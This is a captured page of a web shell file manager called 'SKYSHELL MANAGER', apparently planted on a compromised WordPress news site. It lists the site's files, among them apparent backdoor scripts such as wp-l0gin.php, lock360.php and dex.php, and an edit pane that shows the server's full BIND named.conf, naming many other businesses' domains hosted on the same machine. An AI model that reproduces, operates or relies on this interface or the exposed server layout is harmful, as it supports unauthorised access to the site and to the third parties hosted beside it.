📁
SKYSHELL MANAGER
PHP v8.3.32
Create
Create
Path:
root
/
home
/
nnoticias
/
public_html
/
Name
Size
Perm
Actions
📁
.tmb
-
0777
🗑️
🏷️
🔒
📁
.well-known
-
0755
🗑️
🏷️
🔒
📁
3ee10
-
0555
🗑️
🏷️
🔒
📁
cgi-bin
-
0755
🗑️
🏷️
🔒
📁
d4bf7e
-
0755
🗑️
🏷️
🔒
📁
sap-logs
-
0755
🗑️
🏷️
🔒
📁
seo
-
0755
🗑️
🏷️
🔒
📁
wp-admin
-
0755
🗑️
🏷️
🔒
📁
wp-content
-
0755
🗑️
🏷️
🔒
📁
wp-includes
-
0755
🗑️
🏷️
🔒
📄
.htaccess
0.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess.bk
2.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.htaccess_backup
5.91 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
.litespeed_flag
0.29 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
cleanup.php
2.88 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
dex.php
77.53 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
5.02 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
htaccess.txt
0.81 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php
12.78 KB
0555
🗑️
🏷️
⬇️
✏️
🔒
📄
index.php0
0.39 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
license.txt
19.44 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
lock360.php
47.55 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
min.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
php.ini
0.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
readme.html
7.25 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
robots.txt
0.44 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
search.php
1.47 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
worksec.php
1.06 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-activate.php
7.18 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-blog-header.php
0.34 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-comments-post.php
2.27 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config-sample.php
3.26 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-config.php
4.08 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-cron.php
5.49 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-editor.php
53.57 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-l0gin.php
170.48 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-links-opml.php
2.43 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-load.php
3.84 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-login.php
50.23 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-mail.php
8.52 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-settings.php
30.33 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-signup.php
33.71 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-theme.php
216.5 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
wp-trackback.php
5.09 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
📄
xmlrpc.php
3.13 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: named.conf
options { /* make named use port 53 for the source of all queries, to allow * firewalls to block all ports except 53: */ // query-source port 53; recursion no; /* We no longer enable this by default as the dns posion exploit has forced many providers to open up their firewalls a bit */ // Put files that named is allowed to write in the data/ directory: directory "/var/named"; // the default pid-file "/var/run/named/named.pid"; dump-file "data/cache_dump.db"; statistics-file "data/named_stats.txt"; /* memstatistics-file "data/named_mem_stats.txt"; */ allow-transfer { "none"; }; }; logging { channel default_log { file "/var/log/named/named.log" versions 5 size 128M; print-time yes; print-severity yes; print-category yes; severity warning; }; category default { default_log; }; category general { default_log; }; }; // All BIND 9 zones are in a "view", which allow different zones to be served // to different types of client addresses, and for options to be set for groups // of zones. // // By default, if named.conf contains no "view" clauses, all zones are in the // "default" view, which matches all clients. // // If named.conf contains any "view" clause, then all zones MUST be in a view; // so it is recommended to start off using views to avoid having to restructure // your configuration files in the future. view "localhost_resolver" { /* This view sets up named to be a localhost resolver ( caching only nameserver ). * If all you want is a caching-only nameserver, then you need only define this view: */ match-clients { 127.0.0.0/24; }; match-destinations { localhost; }; recursion yes; // The root hint zone has been removed from the default named.conf. // You may add it again by uncommenting the following block: /* zone "." IN { type hint; file "/var/named/named.ca"; }; */ /* these are zones that contain definitions for all the localhost * names and addresses, as recommended in RFC1912 - these names should * ONLY be served to localhost clients: */ include "/var/named/named.rfc1912.zones"; }; view "internal" { /* This view will contain zones you want to serve only to "internal" clients that connect via your directly attached LAN interfaces - "localnets" . */ match-clients { localnets; }; match-destinations { localnets; }; recursion yes; // The root hint zone has been removed from the default named.conf. // You may add it again by uncommenting the following block: /* zone "." IN { type hint; file "/var/named/named.ca"; }; */ // include "/var/named/named.rfc1912.zones"; // you should not serve your rfc1912 names to non-localhost clients. // These are your "authoritative" internal zones, and would probably // also be included in the "localhost_resolver" view above : zone "5-180-150-254.cprapid.com" { type master; file "/var/named/5-180-150-254.cprapid.com.db"; }; zone "vmi3126471.contaboserver.net" { type master; file "/var/named/vmi3126471.contaboserver.net.db"; }; zone "host.server-guru-usa.com" { type master; file "/var/named/host.server-guru-usa.com.db"; }; zone "grupologisticoplim.com.mx" { type master; file "/var/named/grupologisticoplim.com.mx.db"; }; zone "server-guru-usa.com" { type master; file "/var/named/server-guru-usa.com.db"; }; zone "gurumkt.com.mx" { type master; file "/var/named/gurumkt.com.mx.db"; }; zone "comrom.com.mx" { type master; file "/var/named/comrom.com.mx.db"; }; zone "cisnerosmontesabogados.com" { type master; file "/var/named/cisnerosmontesabogados.com.db"; }; zone "elviatransformateyvive.com" { type master; file "/var/named/elviatransformateyvive.com.db"; }; zone "noahtoursmanzanillo.com" { type master; file "/var/named/noahtoursmanzanillo.com.db"; }; zone "restauranteszlo.com" { type master; file "/var/named/restauranteszlo.com.db"; }; zone "taxa.mx" { type master; file "/var/named/taxa.mx.db"; }; zone "framboyanmanzanillo.com" { type master; file "/var/named/framboyanmanzanillo.com.db"; }; zone "ramconco.com" { type master; file "/var/named/ramconco.com.db"; }; zone "transvla.com" { type master; file "/var/named/transvla.com.db"; }; zone "gucomex.com" { type master; file "/var/named/gucomex.com.db"; }; zone "nuestrasnoticias.info" { type master; file "/var/named/nuestrasnoticias.info.db"; }; zone "medic-saas.com" { type master; file "/var/named/medic-saas.com.db"; }; zone "alfahybridtraning.com" { type master; file "/var/named/alfahybridtraning.com.db"; }; zone "lahiguera.mx" { type master; file "/var/named/lahiguera.mx.db"; }; zone "cgbconstrucciones.com" { type master; file "/var/named/cgbconstrucciones.com.db"; }; zone "ngimmigrations.com" { type master; file "/var/named/ngimmigrations.com.db"; }; zone "escueladmanzanillo.com" { type master; file "/var/named/escueladmanzanillo.com.db"; }; zone "nginsuranceagency.com" { type master; file "/var/named/nginsuranceagency.com.db"; }; zone "jprealestatezlo.com" { type master; file "/var/named/jprealestatezlo.com.db"; }; zone "gurumarketingusa.com" { type master; file "/var/named/gurumarketingusa.com.db"; }; zone "aqui-entrenos.com" { type master; file "/var/named/aqui-entrenos.com.db"; }; }; view "external" { /* This view will contain zones you want to serve only to "external" clients * that have addresses that are not on your directly attached LAN interface subnets: */ recursion no; additional-from-cache no; // you'd probably want to deny recursion to external clients, so you don't // end up providing free DNS service to all takers // The root hint zone has been removed from the default named.conf. // You may add it again by uncommenting the following block: /* zone "." IN { type hint; file "/var/named/named.ca"; }; */ // These are your "authoritative" external zones, and would probably // contain entries for just your web and mail servers: // BEGIN external zone entries zone "5-180-150-254.cprapid.com" { type master; file "/var/named/5-180-150-254.cprapid.com.db"; }; zone "vmi3126471.contaboserver.net" { type master; file "/var/named/vmi3126471.contaboserver.net.db"; }; zone "host.server-guru-usa.com" { type master; file "/var/named/host.server-guru-usa.com.db"; }; zone "grupologisticoplim.com.mx" { type master; file "/var/named/grupologisticoplim.com.mx.db"; }; zone "server-guru-usa.com" { type master; file "/var/named/server-guru-usa.com.db"; }; zone "gurumkt.com.mx" { type master; file "/var/named/gurumkt.com.mx.db"; }; zone "comrom.com.mx" { type master; file "/var/named/comrom.com.mx.db"; }; zone "cisnerosmontesabogados.com" { type master; file "/var/named/cisnerosmontesabogados.com.db"; }; zone "elviatransformateyvive.com" { type master; file "/var/named/elviatransformateyvive.com.db"; }; zone "noahtoursmanzanillo.com" { type master; file "/var/named/noahtoursmanzanillo.com.db"; }; zone "restauranteszlo.com" { type master; file "/var/named/restauranteszlo.com.db"; }; zone "taxa.mx" { type master; file "/var/named/taxa.mx.db"; }; zone "framboyanmanzanillo.com" { type master; file "/var/named/framboyanmanzanillo.com.db"; }; zone "ramconco.com" { type master; file "/var/named/ramconco.com.db"; }; zone "transvla.com" { type master; file "/var/named/transvla.com.db"; }; zone "gucomex.com" { type master; file "/var/named/gucomex.com.db"; }; zone "nuestrasnoticias.info" { type master; file "/var/named/nuestrasnoticias.info.db"; }; zone "medic-saas.com" { type master; file "/var/named/medic-saas.com.db"; }; zone "alfahybridtraning.com" { type master; file "/var/named/alfahybridtraning.com.db"; }; zone "lahiguera.mx" { type master; file "/var/named/lahiguera.mx.db"; }; zone "cgbconstrucciones.com" { type master; file "/var/named/cgbconstrucciones.com.db"; }; zone "ngimmigrations.com" { type master; file "/var/named/ngimmigrations.com.db"; }; zone "escueladmanzanillo.com" { type master; file "/var/named/escueladmanzanillo.com.db"; }; zone "nginsuranceagency.com" { type master; file "/var/named/nginsuranceagency.com.db"; }; zone "jprealestatezlo.com" { type master; file "/var/named/jprealestatezlo.com.db"; }; zone "gurumarketingusa.com" { type master; file "/var/named/gurumarketingusa.com.db"; }; zone "aqui-entrenos.com" { type master; file "/var/named/aqui-entrenos.com.db"; }; };
Save